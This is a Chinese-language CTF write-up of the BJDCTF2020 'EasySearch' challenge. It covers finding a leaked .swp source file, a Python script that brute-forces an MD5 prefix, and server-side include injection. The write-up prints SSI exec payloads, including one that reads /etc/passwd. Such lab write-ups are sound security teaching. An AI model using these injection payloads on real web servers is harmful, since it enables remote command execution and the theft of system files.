©2020-2024 ioDraw All rights reserved
<>[BJDCTF2020]EasySearch
首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。
然后dirsearch就扫描出来了index;php.swp文件。。。
然后就看到了源码 进行代码审计
[<?php ob_start(); function get_hash(){ $chars =
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].
$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times $content = uniqid()
.$random; return sha1($content); } header("Content-Type:
text/html;charset=utf-8"); *** if(isset($_POST['username']) and $_POST[
'username'] != '' ) { $admin = '6d0bc1'; if ( $admin == substr(md5($_POST[
'password']),0,6)) { echo "<script>alert('[+] Welcome to manage
system')</script>"; $file_shtml = "public/".get_hash().".shtml"; $shtml = fopen(
$file_shtml, "w") or die("Unable to open file!"); $text = ' *** *** <h1>Hello,'.
$_POST['username'].'</h1> *** ***'; fwrite($shtml,$text); fclose($shtml); ***
echo "[!] Header error ..."; } else { echo "<script>alert('[!]
Failed')</script>"; }else { *** } *** ?>
代码审计 就是bcusername可以随便写 ,但是 password的前六位必须要md5加密是6d0bc1
python爆破 脚本如下:
import hashlib for i in range(1000000000): a = hashlib.md5(str(i).encode(
'utf-8')).hexdigest() if a[0:6] == '6d0bc1': print(i,a)
运行结果
2020666 6d0bc1153791aa2b4e18b4f344f26ab4 2305004
6d0bc1ec71a9b814677b85e3ac9c3d40 9162671 6d0bc11ea877b37d694b38ba8a45b19c
然后进行登录
登录之后,前端认真找找
发现一个url here
知识点:SSI注入漏洞
SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI
注入允许远程在 Web 应用中注入脚本来执行代码。
SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。
从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
显示服务器端环境变量<#echo> 本文档名称: <!–#echo var="DOCUMENT_NAME"–> 现在时间: <!–#echo
var="DATE_LOCAL"–> 显示IP地址: <! #echo var="REMOTE_ADDR"–> 将文本内容直接插入到文档中<#include>
<! #include file="文件名称"–> <!--#include virtual="index.html" --> <! #include
virtual="文件名称"–> <!--#include virtual="/www/footer.html" -->
注:file包含文件可以在同一级目录或其子目录中,但不能在上一级目录中,virtual包含文件可以是Web站点上的虚拟目录的完整路径
显示WEB文档相关信息<#flastmod><#fsize>(如文件制作日期/大小等) 文件最近更新日期: <! #flastmod
file="文件名称"–> 文件的长度: <!–#fsize file="文件名称"–>
④直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序) <!–#exec cmd="文件名称"–> <!--#exec cmd="cat
/etc/passwd"--> <!–#exec cgi="文件名称"–> <!--#exec cgi="/cgi-bin/access_log.cgi"–>
将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。
(SSI注入的条件:
1.Web 服务器已支持SSI(服务器端包含)
2.Web 应用程序未对对相关SSI关键字做过滤
3.Web 应用程序在返回响应的HTML页面时,嵌入用户输入)
利用SSI注入漏洞,我们可以在username变量中传入ssi语句来远程执行系统命令。
看一下当前目录的文件<!--#exec cmd="ls"-->
回归本题
通过
<!--#exec cmd="ls"-->
命令查看回显
看到ls的文件目录
看上一级目录
<!--#exec cmd="ls ../"-->
最后的命令查看flag
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
好了好了 累死了 晚上轮滑去
妈咦 溜了 你们自学把